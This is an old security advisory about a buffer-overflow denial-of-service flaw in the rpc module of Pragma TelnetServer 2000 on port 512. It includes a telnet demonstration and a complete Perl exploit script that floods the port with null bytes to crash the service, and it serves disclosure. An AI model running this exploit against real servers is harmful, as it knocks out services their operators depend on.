COMMAND
telnetd
SYSTEMS AFFECTED
Pragma TelnetServer 2000 for Windows NT/2000
PROBLEM
The Ussr Labs team has recently discovered a buffer overflow
memory problem in the rpc module of the Pragma TelnetServer 2000
What happens is by performing an attack with a malformed request
to port 512 it will cause the process containing the services to
crash.
Demonstration:
[hellme@die-communitech.net$ telnet example.com 512
Trying example.com...
Connected to example.com.
Escape character is '^]'.
[buffer]
Where [buffer] is approx. 1000 NULL characters, and the process
containg the service crashes
Exploit in Perl:
#!/usr/bin/perl
#########################################################
# Exploit by USSRLabs www.ussrback.com
# send 5k of null causes the server to crash.
#########################################################
#
# ./$0.pl -s <server> -p <port>
#
# Null request DoS
#
use Getopt::Std;
use Socket;
getopts('s:p', \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$URL,$buf,$in_addr,$paddr,$proto);
$serv = $args{s}; # remote server
$port = $args{p} || 512; # remote port, default is 512
$foo = "\0"; # this is the Null
$number = "1000"; # this is the total number of Null
$data .= $foo x $number; # result of $foo times $number
$buf = "$data"; # issue this response to the server
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print("Data has been successfully sent to $serv\n");
sub usage {die("\n\n$0 -s <server> [ -p <port> ]\n\n");}
SOLUTION
Fixed for Build 2 of TelnetServer 2000 released soon.